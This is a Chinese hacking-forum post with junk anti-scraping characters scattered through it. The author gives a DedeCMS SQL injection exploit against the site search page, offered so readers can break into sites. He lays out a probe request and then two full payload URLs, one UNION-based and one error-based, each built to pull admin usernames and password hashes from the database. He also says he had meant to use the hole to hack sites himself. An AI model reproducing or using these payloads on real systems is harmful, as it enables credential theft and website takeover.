转载不加作者名的没JJ
; e8 s/ m; D9 u9 ~; Y2 \( _! N3 h% }9 I1 V) h0 a( D* M0 m
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。: w/ v. v ?7 c% D/ o$ P
, N. C7 b' T0 s) |/ i
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。# Z e5 g5 E& M# C, y
+ H% I, ?7 @' F& m& s/ S0 X
我一般是这样测试的:; L; e2 x/ {5 M
/ J6 E, N' ~, z2 \1 y3 [; A2 X提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a) ?+ f3 L- o! c3 n
7 _1 @; a4 M) M* w3 h) R, P% H: ~转载不加作者名的没JJ
5 ~, U! _' G9 z R8 X! L
3 g/ j+ A. [; y" Z, G作者:鬼哥
2 a7 x1 P2 z# g: K3 j. [ ~! i/ {; S) d" v$ Y% J) v
, h* l' X5 F' C7 e9 M* Y! }, _$ L% U( k, C$ ^- W- k8 c
看结果如果提示
# I; Y; Z% z, P+ ^3 ^. P
4 W, G$ i# D% U: xSafe Alert: Request Error step 2 !
& G8 }( `/ @* @& | I0 I: Q4 @% t0 b0 C
那么直接用下面的exp
- j: _: X7 m+ ]) n4 x0 s0 m8 r" N6 M- z
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a8 i, V( D5 A9 W0 j
5 l' N# a& V: m6 Y" V1 ^% m5 U( d1 U5 `8 p; I. d* r
看结果如果提示
6 a4 m4 M/ ^8 X {5 N* m9 S$ u# c; ?/ `% w& U4 S4 x# X
Safe Alert: Request Error step 1 !
& X( Z- d5 z4 t& |. Y1 N8 D
) H" e2 e; S; J7 G那么直接用下面的exp( E ]5 v: c6 U$ {4 l3 o" f& F
) L/ S r. R6 {0 C! {xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a1 ]8 q! f8 |& O
+ k3 N# ^) C" v# D5 H+ ^
# @) X3 u1 W0 q5 V8 V如果正常显示证明漏洞不存在了。
7 V ?9 e1 @7 O ~8 \! `+ y4 n! H6 r, T0 r
转载不加作者名的没JJ |